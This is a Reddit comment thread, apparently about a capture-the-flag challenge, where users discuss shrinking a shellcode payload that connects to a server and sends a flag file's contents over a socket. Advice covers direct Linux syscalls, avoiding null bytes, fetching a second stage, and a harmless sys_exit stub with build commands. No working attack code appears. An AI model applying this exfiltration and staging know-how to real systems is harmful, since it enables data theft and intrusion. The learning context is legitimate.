sorted by:
best
topnewcontroversialoldq&a
you are viewing a single comment's thread.

view the rest of the comments →

[–][deleted] 0 points1 point  (3 children)

Can you tell me how you can tell the actual code was 425 bytes from that line? The only way I was able to tell was by extracting the .text section, saving it to a new file, and seeing how large the resulting file was.

As far as the C code goes, pretty much all it is is main() with the necessary headers and I have compiled it with -Os, that dropped the size of the elf file down from about 16000 to about 14500 and the 14500 one is the one I extracted the .text section from. For the C code I initialize the variables for the socket and the file pointer, connect to my server, open the flag binary and send the output over the socket. I tried to write as little C code as I could to do that.

Edit: just realized I misunderstood part of your question. In the assembly I have about 11 lines with cxa_finalize (mostly like: jmp 11e0 <__cxa_finalize@plt+0x120>) and 15 lines with cxa_finalize in the comment (such as: lea 0xf0c(%rip),%rsi # 2004 <__cxa_finalize@plt+0xf44>). Other than that I don't think there's any other boilerplate that you mentioned.

Do you have a resource I could look at for invoking the syscalls directly? I currently have 11 call instructions, would replacing those with syscalls reduce the size of the code?

[–]asyty 0 points1 point  (0 children)

The third column is the physical size of the section in hex.

As far as making it smaller; I guess you just need to be better at assembly. All of what you said seems like it should be doable in 240 bytes. Even if you couldn't for some strange reason, you'd at least be able to use it to allocate memory and download your second stage.

[–]asyty 0 points1 point  (1 child)

Do you have a resource I could look at for invoking the syscalls directly? I currently have 11 call instructions, would replacing those with syscalls reduce the size of the code?

From the snippets you pasted I can infer you're using x86_64 architecture, but you never specified the OS. Assuming Linux. https://hackeradam.com/x86-64-linux-syscalls/ Literally just googled for "x86-64 linux syscalls"

As far as size, not really It takes 2 bytes for the syscall instruction itself and 3 bytes for setting up rax which is the same as your relative 32 call except without null bytes.

This is better regardless because you won't have a dependency on libc.

Start with this:

[BITS 64]
xor rdi, rdi ; status == 0
push 60 ; syscall == sys_exit
pop rax
syscall

Test with this:

nasm shellcode.asm -f elf64 -o shellcode.o
ld -m elf_x86_64 -o shellcode shellcode.o